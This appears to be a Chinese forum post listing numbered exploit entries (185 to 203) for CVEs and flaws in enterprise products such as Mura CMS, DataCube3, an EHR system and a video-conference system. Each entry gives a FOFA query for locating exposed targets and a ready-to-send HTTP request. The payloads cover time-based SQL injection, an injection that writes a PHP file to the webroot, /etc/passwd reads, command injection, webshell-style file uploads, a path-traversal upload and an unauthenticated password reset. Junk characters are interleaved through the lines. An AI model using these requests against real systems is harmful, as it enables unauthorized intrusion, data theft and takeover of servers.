# J7 o/ u v i: i9 T( ninsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56'), v3 ~) d2 E* G* S+ V9 ^
) X: l, z) m! k; q9 E' U2 @$ x) y; q+ B
& }! g# R! T* X" H; M- h
185. 瑞友天翼应用虚拟化系统SQL注入
1 W# r2 m: o. |8 p; ~7 H* Cversion < 7.0.5.1- G; {" c! w: ?$ u% h
FOFA:app="REALOR-天翼应用虚拟化系统"/ C3 Y) _! @- |. p6 B# Q0 g% x4 x
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.14 l6 s5 r) P3 |+ G, h" |( P
Host: host
0 }* q& z, P B1 e8 K& m& I
L1 G& R. H6 Q: o& v0 L
6 o; [, j* b; s/ F& r ^7 }0 a186. F-logic DataCube3 SQL注入
9 z3 {& ]8 I" z' r4 X3 hCVE-2024-31750
' r8 V' G" A2 Q* D1 H% cF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
! ?! U G4 Q2 v7 p2 aFOFA:title=="DataCube3"
. o6 I! Q' M/ I# x9 ~POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
0 ?4 |4 k1 s/ a5 }" @Host: your-ip- ~1 J0 V, Y/ I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
' x/ J7 f" L2 @0 n' IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
2 x; K2 C8 c0 n7 L# o- d9 YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- f1 s) | |; ^
Accept-Encoding: gzip, deflate) i9 I; n/ J) A
Connection: close* a; h' n$ r' H4 U; U" o) H! ^
Content-Type: application/x-www-form-urlencoded% L6 e q% N9 @9 _; h/ _
) a$ f* t! w$ ~- H- T# K- F, y
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
4 r. }/ h0 O! b; i1 v
! ~+ ]2 t7 Y$ n ^; F; ]
' Z/ r6 i, q4 A, y) t4 `- D187. Mura CMS processAsyncObject SQL注入
1 l3 D& J- H' V2 |" sCVE-2024-32640' [# }& U" |0 W1 y" h" q5 w% O
FOFA:"Mura CMS"
: j$ n4 H: v+ N2 B9 H: QPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
- y4 j' d9 ^$ Q- P PHost: your-ip0 v" M; `) x% Y4 V( _
Content-Type: application/x-www-form-urlencoded3 g1 p# t2 s; }2 [
1 Z1 h' N0 L2 g. g* g0 b5 a7 u' F: r' m; D' M7 [3 A- S
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1( A+ D5 o7 _' I6 G) r p+ `
0 S, X7 {2 W/ M3 G; L2 S9 _& J) p/ G& @
188. 叁体-佳会视频会议 attachment 任意文件读取5 G" `! z2 V2 e6 O" V! m- n5 f
version <= 3.9.7
+ G& ^( m( W2 |% xFOFA:body="/system/get_rtc_user_defined_info?site_id"
w g/ w7 e1 u* q) x9 pGET /attachment?file=/etc/passwd HTTP/1.1
, ~1 J% ]' C1 {0 P4 x# ?Host: your-ip
4 O n/ P; X- r v3 C _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. I& l/ }8 A/ L4 W8 W) P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* b# d8 q4 d- b' \6 R0 J/ i
Accept-Encoding: gzip, deflate
0 j R) a& `/ Q) t7 W- \2 H: PAccept-Language: zh-CN,zh;q=0.9,en;q=0.8& |/ [. E1 G4 O v6 J+ [# V7 n4 u
Connection: close
) Z, e0 [* b% r# ~
: a! }* g8 A1 `2 }; [/ M$ c s0 P" u. A: C. T
189. 蓝网科技临床浏览系统 deleteStudy SQL注入& ?+ I$ e2 E9 |( z* e: S
FOFA:app="LANWON-临床浏览系统"
2 w) k0 Q+ f% q, pGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
- ? h. {! i# Z* A x- F, `Host: your-ip" t; \% d D3 j, ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! k7 j! a f. i4 p1 c& d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 ]: M: R% U0 ]! {- y. sAccept-Encoding: gzip, deflate
6 v4 ]7 A5 v; G, S8 G4 S+ OAccept-Language: zh-CN,zh;q=0.9
" |! H% H& e/ C- TConnection: close2 m# ^: R; t; U% i$ k6 b9 j
! ^7 B1 ?6 L/ G
. _9 s% x; _9 G, p' k9 l; X T190. 短视频矩阵营销系统 poihuoqu 任意文件读取
* i9 j% {0 o4 y* _/ y& e' PFOFA:title=="短视频矩阵营销系统"7 Q! b" u% {( |* e) O. @ A
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
. {! L' @. [) e" xHost: your-ip
: q$ @" \* B8 F$ A# L8 q7 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
$ w3 |6 D2 [$ C' Y2 V$ }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9* y( ~3 G4 n; o
Content-Type: application/x-www-form-urlencoded
$ r! Q9 a7 b5 P; K& [6 k2 ]Accept-Encoding: gzip, deflate. S% Y; f4 E; \
Accept-Language: zh-CN,zh;q=0.9" M4 v" u0 ?( c
9 j5 M- U7 m! L# o' h% z( _poi=file:///etc/passwd
' a2 H! y9 p/ I+ `5 F: h" w. s4 H" O7 ]3 X8 D
+ t( y( ]! W- h/ ~' T5 E) j1 p
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入8 g& [4 Y! i+ R" M% Q3 m
FOFA:body="/CDGServer3/index.jsp"9 F: `/ s' J% z& O/ U
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
; q8 f f2 p4 [6 F4 sHost: your-ip# L4 W( W# K5 U5 Q. f) y/ J+ h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! X9 W+ P. f) [6 AContent-Type: application/x-www-form-urlencoded6 v/ O. x5 k' W
/ N. }( b$ G. C$ z7 t- mcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
6 `0 S: r/ g/ R k9 p7 i+ V P) A7 L' p% Y9 A, _$ D2 z
% D! U! z+ y2 A% E
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传) x( w$ c8 y- s3 e
FOFA:title="用户登录_富通天下外贸ERP"5 T& B9 J- y. b& h2 p4 u% e" b
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
( C) @; h( L X, {Host: your-ip M7 A* h2 Q& m, K" ?8 L# i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36/ g" b- y) ~0 c/ A& Y8 G0 G0 Q
Content-Type: application/x-www-form-urlencoded
' A) D+ t/ U1 Z7 `/ D) o# g, Y( R; l. q
; b3 ? _" H# g( A<% @ webhandler language="C#" class="AverageHandler" %>' |8 g( U* P( K* `
using System;" C' D! d- s8 D% ^4 c4 J
using System.Web;% |* H( _& Q7 U5 `
public class AverageHandler : IHttpHandler% E* Z" q/ j3 c4 v- C8 s
{
+ X- o: R' Q# h% `2 r( Apublic bool IsReusable& @* g$ [& u3 O5 S7 R1 ]$ q0 H0 h
{ get { return true; } }' V0 i( e1 i: `7 K2 ~
public void ProcessRequest(HttpContext ctx)$ T' X' Z8 _9 V- X1 E- x: C, a, \; L) G
{0 T6 V0 k% @8 r0 G4 E! ~
ctx.Response.Write("test");: z" a* J# K! ^' u! \ H0 a
}+ _ o0 W0 k: s0 p, E7 T
}
& S3 ]+ T% w) [, f( x
) `+ u# g7 D1 |+ G& V; }2 p$ I2 J& [. [
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
* l$ S# ^+ }' X3 b6 p9 u6 EFOFA:body="山石云鉴主机安全管理系统"+ c8 I: I) ?8 g8 k- V
GET /master/ajaxActions/getTokenAction.php HTTP/1.1$ p$ p& P* w4 z8 S: V+ t1 Y3 w
Host:+ k: ?0 d- @, U- A0 b: H
Cookie: PHPSESSID=2333333333333;
7 d6 R+ F, c$ aContent-Type: application/x-www-form-urlencoded7 P3 F! A# O1 s; l `
User-Agent: Mozilla/5.0
* A, Q+ K, ]' N e" a" x" o
7 y p% ~( H! F3 |( c/ i8 f2 K
6 Y; ]3 ?1 m% w: G# TPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1* R, p+ ]( ~4 W* E ~ K
Host:
/ v- i( N' b" `User-Agent: Mozilla/5.0; r* Q$ ? ?1 G, R$ q
Accept-Encoding: gzip, deflate
8 W; Q) V+ Z' h9 pAccept: */*, \" v' w7 S+ u7 G
Connection: close
2 q- u& O$ ^4 x/ bCookie: PHPSESSID=2333333333333;
7 e3 b6 w9 L1 V6 W- ^3 F1 iContent-Type: application/x-www-form-urlencoded
, |! C9 v' C0 AContent-Length: 84
# k W7 @6 I. P; a6 r
5 R- |- T$ i; ]param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config'), L+ W) k3 [# R1 M% B
& o% T# }& D9 E+ z: ^9 G- ^; h
' K u7 d$ z5 l; P9 X: q, EGET /master/img/config HTTP/1.19 P. }+ l7 n, @8 Z
Host:6 x2 q3 f0 h7 l6 U6 {( {( R
User-Agent: Mozilla/5.0# g8 Z" f, |% p: ^6 y: y5 ]' H
1 q: W- v5 g% }' \: {- M" l8 d
9 Q9 n2 S4 D1 `3 n194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传% }5 C! S$ c8 l6 I- |
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
6 G9 n2 G x3 C. k) Q3 |" f5 S; f2 R2 J4 u# V$ T. \7 D" l
POST /servlet/uploadAttachmentServlet HTTP/1.10 e- W: e5 q5 f0 B! ~6 V0 P1 \
Host: host" J$ M+ G; ?# l( v3 i# B5 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
9 }! N) d( U& K! t! i. P1 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 t* g9 f8 k5 d: L0 M' K: V1 @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# @- e3 l! f5 a+ vAccept-Encoding: gzip, deflate B- V; q# B5 b0 w1 E1 R
Connection: close
4 z# Q& Q3 ?, O1 B0 ?- QContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk: o. X- U r! Y9 |, ?2 R
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
) {# ]+ e1 {8 _
3 x9 A4 \/ a/ VContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
5 s8 H! E1 }: R6 o' s, r9 i' o8 k; gContent-Type: text/plain9 K$ j9 y0 _+ M8 J
<% out.println("hello");%>
& p$ R) W( p9 F/ k% E" U G% p------WebKitFormBoundaryKNt0t4vBe8cX9rZk' F8 I! J- m( [
Content-Disposition: form-data; name="json"7 h1 D( p' j1 Q# s3 a1 A
{"iq":{"query":{"UpdateType":"mail"}}}% \4 Y' ]- o/ s. h7 G9 M5 V* f C2 {3 Y
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--. V6 V8 r, Y% P
! t# ^8 v! A: m3 i
/ A8 k# J1 a0 d6 p
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行$ y0 K0 ~( B# |: b- L" J; ?( ~
FOFA:title=="飞鱼星企业级智能上网行为管理系统
' H. j n" D8 k- UPOST /send_order.cgi?parameter=operation HTTP/1.1$ s S2 B6 e+ V4 J; Q8 |
Host: 127.0.0.1$ o/ t2 D4 _- h4 S1 e# U4 D C; ^% T
Pragma: no-cache
* j0 ]- Y! g& h! U$ c3 VCache-Control: no-cache0 D$ U$ L$ y; C& I* G b. N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.366 q6 a& T1 N/ [$ R
Accept: */*& G& R+ C; J! [5 \1 P% N; W6 A
Accept-Encoding: gzip, deflate* l7 d1 x, J& `4 Q! N9 S
Accept-Language: zh-CN,zh;q=0.9
( A, Q4 N( i) Y6 n/ S" X$ `* A: NConnection: close2 i$ n: N3 c' [" c
Content-Type: application/x-www-form-urlencoded+ v& O4 h; [- m% t- u5 J# C2 s! l5 Z
Content-Length: 686 n V* l' y- {5 T+ Y
/ W3 K: F# S2 ^2 F
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
% |& D5 b/ m. _4 w( P
0 P' X4 A0 V# R5 W5 O1 G' W, \1 A9 u! O! l6 O% M/ B* o
196. 河南省风速科技统一认证平台密码重置# C. V8 c, C. u9 a- ^
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"5 f4 R7 l: }, U/ G3 s3 Y
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
# _7 b) c7 [ @- aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36+ N7 g% D+ e, |7 x
Content-Type: application/json;charset=UTF-8
* V; D8 c M/ r- E/ \% A* dX-Requested-With: XMLHttpRequest
5 n; [) o. v H# p. b8 e9 xHost:1 y8 s/ @) r3 L1 G
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
O* O% d. g, }; K' n2 _Content-Length: 45& g" l s' k! W1 J% L- j# F
Connection: close8 T; Q2 N2 g* m( W
6 l; @5 x) a \% c{"xgh":"test","newPass":"test666","email":""}% [, L# S! g+ L; A1 L
% Q& F" l% _8 a5 T+ I4 R
5 S1 M+ ?% i- M; {; O) u
}2 l7 O5 S# Z1 }4 y0 w* s197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入" B" Q/ c$ I! z5 I6 ?/ ~
FOFA:app="浙大恩特客户资源管理系统"
) A5 j6 E* p( U# t% w+ ^, VGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
5 m3 s) b- R8 v- d6 d- X! QHost:
& L1 B Y3 H. k: H- T- j! oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
/ n2 C1 N0 H% Q, Z5 ]' hAccept-Encoding: gzip, deflate
8 ?1 j! M& F5 C. a9 h* A* UConnection: close D8 z+ y: O. f; p3 I! l+ K% V
6 N/ n0 F, c7 [0 V, \3 Z5 G# E2 l# X* H# @& V1 t. s# l
k F# N& t9 G( e% x$ y0 }6 i
198. 阿里云盘 WebDAV 命令注入1 p% V9 j U8 |) E L$ d0 E- @
CVE-2024-29640
3 F1 m4 m* J$ P& F2 vGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
7 o' Z) b; A5 ~6 m# q* OCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
1 M9 ^- @; X4 R4 R e3 B% ZAccept: */*
& b6 O2 P3 d6 }& R* o. Z& jAccept-Encoding: gzip, deflate/ }5 Y3 s, |) Q
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.66 n: M+ R8 `4 Z# @9 _
Connection: close
9 u5 y+ \# V/ T ?: Y6 m' b C) H! c w: p# Y
' y e6 F6 i0 f; k2 }
199. cockpit系统assetsmanager_upload接口 文件上传; h) Z9 U8 \* O, x- R; n' f! _* S
: F$ }) ]- v) }, V1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:# Z0 \9 z, x! T9 ^1 Z% l; I
GET /auth/login?to=/ HTTP/1.1
# Y8 D( @" S" N9 y& Q6 h& D7 X& Z( C. u
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
5 }5 } B% L4 x* w
) m' B Y* ~- c0 u9 P2.使用刚才上一步获取到的jwt获取cookie:5 _+ V6 L5 S6 x! E6 j; m
6 M0 b9 C& J9 `# [POST /auth/check HTTP/1.15 v) l+ w7 K6 C; ]% ^- y
Content-Type: application/json% Z1 l8 ~& Q# Q6 _. f8 S3 F0 W
4 G' ?8 s. S# E7 ^5 }* L. k$ h{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}1 v; U$ y, I% }
7 w! y2 s6 o b. I/ T! h响应:200,返回值:
& p. u2 w1 @2 b1 ~# `Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
5 w# e# K% O, O' V8 L6 ^Fofa:title="Authenticate Please!" @/ h1 w1 f5 Z' q: a m
POST /assetsmanager/upload HTTP/1.1
x6 G& c& | W! IContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
: g! j# W9 ^$ q+ V7 ` yCookie: mysession=95524f01e238bf51bb60d77ede3bea92
6 o! W* C6 N5 @3 M: {4 O) x& |# `# Q) }. \5 r
-----------------------------36D28FBc36bd6feE7Fb3/ q8 T7 m8 M8 _8 p! o
Content-Disposition: form-data; name="files[]"; filename="tttt.php"8 m/ [# v$ i1 R9 L4 }, \
Content-Type: text/php
9 ?! p3 Z9 r7 y
2 a& N; M% |4 ^. Y) a) C<?php echo "tttt";unlink(__FILE__);?>+ w+ k" b6 W; I' ^# d- h$ W* w- f' `
-----------------------------36D28FBc36bd6feE7Fb3
% z+ I4 E( t7 ^Content-Disposition: form-data; name="folder"
+ m+ D1 K: e: H: p! }7 a5 v# D. d: D- K) }1 |& R
-----------------------------36D28FBc36bd6feE7Fb3--
! B$ I( h* h/ ] n
8 F8 [0 {. J. K. T/ Q* R C O4 r
/storage/uploads/tttt.php
; i, l( W( O X* w5 Y: K! M x/ H$ j
200. SeaCMS海洋影视管理系统dmku SQL注入9 N" h6 L# D, W; I9 m
FOFA:app="海洋CMS"; ?5 c5 h( y: i+ ^+ a# J
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
: ~3 D8 C% e- kCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s7 K; ^6 ]6 Z8 V" ?$ M! f7 ]
Upgrade-Insecure-Requests: 1
: V( h" W S8 F; d* H5 zCache-Control: max-age=0
% @2 g3 X u {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 h' v6 w# L$ g* H' }Accept-Encoding: gzip, deflate
8 H# W) D& ^& j8 O; Q& l/ a8 q7 [Accept-Language: zh-CN,zh;q=0.9 Z9 F8 m0 P- ]$ p6 X- r5 M
( a2 B9 ? j: ~$ d9 \+ i* q/ a: z
* R! A x0 w B7 m, ~4 x9 N
201. 方正全媒体新闻采编系统 binary SQL注入2 ?) \7 o$ K7 E) U6 n
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
$ r. |) c" b5 L" m/ j/ CPOST /newsedit/newsplan/task/binary.do HTTP/1.13 f: s( ?% Q6 X& {9 b% u. h6 H: a
Content-Type: application/x-www-form-urlencoded
, q1 j* v \. E5 ]: i, oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" t6 ~- [! j# D& r GAccept-Encoding: gzip, deflate
( Q; y# J" {) t2 Y. YAccept-Language: zh-CN,zh;q=0.9
- @$ @6 M. O/ j; FConnection: close( ^$ k: ^# f2 @
, n" W. H2 s/ V; w3 t
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=18 q2 W+ V3 {, ~! J1 i& i3 }3 W
0 L$ v: W, A$ p4 `& z6 [2 ?( N
- K0 d) H% S* D/ \- k202. 微擎系统 AccountEdit任意文件上传$ j& ~+ P# m' _) j) j# o1 m
FOFA:body="/Widgets/WidgetCollection/"
+ G0 J, C$ m; l3 ^获取__VIEWSTATE和__EVENTVALIDATION值
3 M- T% b: V$ Y, u( `GET /User/AccountEdit.aspx HTTP/1.18 O, H, s5 y% x# s5 F
Host: 滑板人之家
7 o2 S5 {, D+ M+ L# vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31: u/ D9 k; z6 [& R0 ?7 O. ?
Content-Length: 0
* T/ ], m3 p8 V$ V) B
8 u( d" k' M; L$ {2 C7 U2 d4 z. f& i5 @( S' s A# N0 ~
替换__VIEWSTATE和__EVENTVALIDATION值5 _; W; ^1 U5 ]: M7 m$ e9 k
POST /User/AccountEdit.aspx HTTP/1.19 R* t5 Y/ m( F, O* m% B
Accept-Encoding: gzip, deflate, br. W1 G5 I' |. Z$ F. @5 m
Content-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356872 d5 x1 `! f5 c9 t5 f" Q
% G1 h6 o1 k( V9 O9 ?+ |- [
-----------------------------786435874t385875938657365873465673587356877 ~$ g ]8 h- {! a2 `) N
Content-Disposition: form-data; name="__VIEWSTATE": } u1 f+ }$ J( J& E6 g
* D& D* M- S ]: Q
__VIEWSTATE
+ }* y) A' n6 Q# y9 _" j7 e# ?" C-----------------------------786435874t38587593865736587346567358735687
2 f6 e: v4 K( [9 ^Content-Disposition: form-data; name="__EVENTVALIDATION"% I5 Z: p* d% y; |( R) w; w1 G
* |) z* D% U( p
__EVENTVALIDATION* {% q. n6 I# A+ V
-----------------------------786435874t38587593865736587346567358735687
1 G9 q/ o( p6 z% c3 @, R2 HContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"0 ~8 E5 P# h, T( D( k: c8 {
Content-Type: text/plain
" F9 c: }1 x" l* J8 e! h; |# h* P }( V6 a' V" o
Hello World!- i* k; ^, s" Y) `' N8 \" ~
-----------------------------786435874t385875938657365873465673587356878 |2 z/ T9 g2 x1 B# D
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
4 ]: N: ^) L3 u" @1 n
& X3 E9 n8 j. Y- i, d0 o9 a) @上传图片
0 i: X* q2 F/ ?( W-----------------------------786435874t38587593865736587346567358735687
' n2 y# z3 k k5 o0 ^( BContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"# }0 A/ m9 R8 q! K! A) ~
, V) }+ I B G2 d8 Z; i& X6 p8 A' E7 K, Q
-----------------------------786435874t385875938657365873465673587356870 S0 B% v5 E; `5 L: Z* ?
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail" W, q8 B3 D4 o: W1 G5 ^; U
7 v2 w9 }) H1 Y1 K% }- M$ [: B6 r; Z4 X
-----------------------------786435874t38587593865736587346567358735687--) s# L0 a6 U+ ^4 N
7 l* n5 u3 t* B5 {9 c
8 d; S0 x# F9 J9 i. W
/_data/Uploads/1123.txt% m' p1 u2 c# `
5 M+ z, }4 I2 ]$ Q* R9 i203. 红海云EHR PtFjk 文件上传
& R1 j9 z2 y- O- l9 i# h/ K/ NFOFA:body="RedseaPlatform"' K3 P0 D( ~1 N" q
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1' l1 |9 F5 e5 S( I* R
Host: x.x.x.x
: z$ d7 N3 P7 X/ \Accept-Encoding: gzip0 E6 \9 g: d3 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 z: A3 o9 P! P( n7 [
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
" G% B3 n9 x' o5 n2 E5 u, Y+ \Content-Length: 210
) u Q# q4 F* P0 M4 O) n3 [) W( i8 `+ V) f
------WebKitFormBoundaryt7WbDl1tXogoZys4
& W4 o; \3 ], q0 lContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
3 w- J* ^ r/ W- }( H) bContent-Type:image/jpeg
f, m9 _5 ?1 o! J- l0 A9 c
/ ]1 b: e" R0 w, r3 e9 l/ {3 k<% out.print("hello,eHR");%>+ e+ j, _5 H i
------WebKitFormBoundaryt7WbDl1tXogoZys4--( C& O# R- g7 N2 c! ^
" F l4 a; ^0 C, _3 F$ K
J5 m0 e O. w# Y( W) z8 U
! w3 T* Q- i0 S: U( Z8 _" n' x
6 u, z8 u( Y! H. v. f* {$ ^6 u
% R9 _; z+ T p8 y) T- l4 i- T/ j [7 R% g3 ]/ t5 o( |" v% n' K
|
发表于 2024-6-5 14:31:29
收藏
支持
反对